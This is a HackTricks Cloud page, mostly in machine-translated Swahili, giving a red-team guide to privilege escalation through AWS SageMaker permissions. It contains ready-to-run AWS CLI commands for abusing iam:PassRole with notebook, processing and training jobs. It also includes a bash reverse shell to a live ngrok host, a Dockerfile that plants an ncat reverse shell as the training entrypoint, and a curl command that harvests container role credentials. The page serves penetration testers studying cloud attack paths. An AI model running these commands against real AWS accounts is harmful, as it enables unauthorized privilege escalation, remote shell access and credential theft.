AWS - Sagemaker Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

`iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`

Anza kuunda noteboook na IAM Role ili kufikia iliyounganishwa nayo:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Majibu yanapaswa kuwa na uwanja wa NotebookInstanceArn, ambao utakuwa na ARN ya mfano mpya wa notebook ulioanzishwa. Tunaweza kisha kutumia API ya create-presigned-notebook-instance-url kuunda URL ambayo tunaweza kutumia kufikia mfano wa notebook mara tu utakapokuwa tayari:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Navigate to the URL with the browser and click on `Open JupyterLab` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.

Sasa inawezekana kufikia akiba ya metadata ya IAM Role.

Potential Impact: Privesc to the sagemaker service role specified.

`sagemaker:CreatePresignedNotebookInstanceUrl`

Ikiwa kuna Jupyter notebooks tayari zinaendesha kwenye hiyo na unaweza kuorodhesha hizo kwa sagemaker:ListNotebookInstances (au kuzipata kwa njia nyingine yoyote). Unaweza kuunda URL kwa ajili yao, kuzipata, na kuiba akiba kama ilivyoonyeshwa katika mbinu ya awali.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililounganishwa.

`sagemaker:CreateProcessingJob,iam:PassRole`

Mshambuliaji mwenye ruhusa hizo anaweza kufanya sagemaker kutekeleza kazi ya usindikaji yenye jukumu la sagemaker lililounganishwa. Mshambuliaji anaweza kuashiria ufafanuzi wa kontena ambalo litakimbizwa katika AWS managed ECS account instance, na kuchukua hati za ruhusa za jukumu la IAM lililounganishwa.

# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililotajwa.

`sagemaker:CreateTrainingJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo ataweza kuunda kazi ya mafunzo, ikiendesha kontena chochote juu yake na jukumu lililounganishwa nalo. Hivyo, mshambuliaji ataweza kuiba hati za jukumu hilo.

Hali hii ni ngumu zaidi kutekeleza kuliko ile ya awali kwa sababu unahitaji kuunda picha ya Docker ambayo itatuma rev shell au creds moja kwa moja kwa mshambuliaji (huwezi kuashiria amri ya kuanzisha katika usanidi wa kazi ya mafunzo).

# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililotajwa.

`sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo ataweza (kwa uwezekano) kuunda kazi ya mafunzo ya hyperparameter, akikimbia kontena yoyote juu yake na jukumu lililounganishwa nalo. Sijawahi kutumia kwa sababu ya ukosefu wa muda, lakini inaonekana kama matumizi ya awali, jisikie huru kutuma PR yenye maelezo ya matumizi.

Marejeleo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - S3 Privesc NextAWS - Secrets Manager Privesc

Last updated 1 month ago